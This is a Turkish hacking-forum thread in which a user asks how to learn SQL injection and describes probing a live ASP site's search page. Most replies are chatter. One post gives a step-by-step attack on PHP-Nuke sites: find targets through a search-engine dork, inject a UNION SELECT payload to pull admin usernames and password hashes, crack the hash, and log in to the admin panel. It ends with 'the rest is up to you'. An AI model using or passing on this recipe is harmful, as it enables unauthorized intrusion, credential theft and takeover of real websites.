




Sql İnjection Örenebilceim Bi Kaynak?
-
hocalar sql injenction arastırıorumda söle bakabilcem sağlam bi kaynak varsa elinizde paylasırsanız sevinirim..
mesela bi sitede searche ' yazdıımda Microsoft JET Database Engine error '80040e14'
Syntax error in query expression 'sorubaslik LIKE '%'%' OR soru LIKE '%'%''.
/arama.asp, line 10
tarzı yazılar cıkıor bunu nasıl ilerletebilcem bunu arıorum :) -
bissürü gavur security sitesi var eğer çakyosan biras ordan bak derim
-
ah bi örnek inş yardımcı olur
http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=sql+injection&x=19&y=9 -
i am a yes
isede bu cümleyi kurmus adama verdiin kaynağa bak hoca :P:P
saol yinede emeğin için :) -
he he
-
dur ben sana yarına buluyum bi döküman güzel anlatışmış wardı bi sitede de
ama bir kaç sql wideosu izlemeden metin üzerinde öğrenemessin benden demesi -
olur hocam metin video ne olursa olur her tür kaynağa acığım :)
-
Php Nuke Sql İnjection
--------------------------------------------------------------------------------
Herhangi bir arama motorundan bu kodu aratıyoruz:
Alıntı:
PHP-Nuke Copyright © 2004 by Francisco Burzi
Bulduğumuz siteden search bölümüne şu kodu yazıp aratıyoruz:
Alıntı:
p0gg0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Search bölümünü bulamadıysanız adresin sonuna şunu ekleyin ondan sonra üstteki kodu yazın:
Alıntı:
www.hackleneceksite.com/modules.php?name=Search
Admin nicki veya nickleri geldi karşımıza.(bütün sitelerde olmayabilir,olmazsa başka site deneyin)Hashı kırdıktan sonra:
Alıntı:
www.hackleneceksite.com/admin.php
açıyoruz.
Gerisi size kalmış! -
Abi sql injection bende araştırdımda tam bi kaynak bulunmuyo kolay,hatta hiç bulamadım :D
-
valla bende bulamadım vazgectim :)
-
hic bir yer...
SQL injection bilmen icin sql bilmen gerekli, pratik yapman icin asp-php gibi bir dil bilmen gerekli localhostta pratik yapman gerekli...gerekli de gerekli
'or' gibi buglardan bahsetmiyorum :)
Toplam Hit: 1702 Toplam Mesaj: 11